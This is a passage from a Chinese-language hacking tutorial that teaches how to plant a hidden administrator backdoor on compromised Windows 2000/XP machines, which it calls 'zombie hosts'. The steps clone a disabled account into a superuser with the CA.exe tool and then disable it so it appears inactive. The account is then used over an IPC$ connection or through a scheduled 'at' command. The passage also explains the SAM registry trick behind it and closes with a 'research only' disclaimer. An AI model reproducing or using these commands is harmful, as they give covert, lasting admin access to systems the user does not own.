2．在这里，我们假设用户hacker被管理员禁用。首先，我先用小榕的超组用户克隆程序 CA.exe，将被禁用的用户hacker 克隆成超级用户（克隆之后，被禁用的用户hacker就会自动被激活了）: CA.EXE \\\\肉鸡 ip Administrator 超级用户密码 hacher hacher密码。

3．如果你现在一个cmdshell，如利用telnet服务或SQLEXEC连接肉鸡的msSQL的默认端口1433得到的shell都可以，这时你只要输入命令：

net user hacker /active:no 这样用户hacker就被禁用了（至少表面上是这样的），当然你也可以将用户hacher换成其它的被禁用的用户。

4．这时如果你在图形界面下看帐户管理器中的用户时,会发现用户hacker被禁用了，但事实上是这样的吗？你用这个被禁用的用户连接一下肉鸡看看是否能连上？用命令：net user \\\\肉鸡ip\\ipc$ "hacker密码" /user:"hacker" 连一连看看。我可以告诉大家，经过我多次试验，次次都能成功，而且还是超级用户权限。

5．如果没有cmdshell怎么办？你可以我上面介绍的at命令来禁用用户hacker;命令格式：at \\\\肉鸡ip 时间 net user hacker /active:no

6．原理：具体的高深的原理我也说不上来，我只能从最简单的说。你先在图形界面下在帐户管理器中禁用一下超级用户administrator看看，肯定会弹出一对话框，并禁止你继续禁用超级用户administrator，同样，因为在克隆时，hacker在注册表的"F"键被超级用户 administrator在注册表的"F"键所替代，因而hacker就具有了超级用户的权限了，但是由于hacker在注册表内"C"健还是原来的 "C"键，所以hacker还是会被禁用，但是它的超级用户权限却不会被禁用，因此被禁用的用户hacker还是可以连接肉鸡，而且还具有超级用户的权限。具体我也说不明白，大家权且这么理解吧。
五、注意的几点事项：

1、隐藏的超级用户建立以后，在帐户管理器中和命令行下均看不到这个用户，但这个用户却存在。

2、隐藏的超级用户建立以后，就不能再修改密码了，因为一旦修改密码，这个隐藏的超级用户就会暴露在帐户管理器中，而且不能删除。

3、如在本机上试验时，最好用系统自带的备份工具先备份好本机的“系统状态”主要是注册表的备份，因为本人做试验时，曾出现过帐户管理器中看不到任何用户，组中也看不到任何组的现象，但它们却存在。幸好我有备份,呵呵。SAM键是毕竟系统最敏感的部位。

4、本方法在2000/XP上测试通过，未在NT上测试。本方法仅供研究，请勿将本方法用于破坏上，利用本方法造成严重后果者，由使用者负责，本人概不负责

（出处：http://www.Gimoo.net）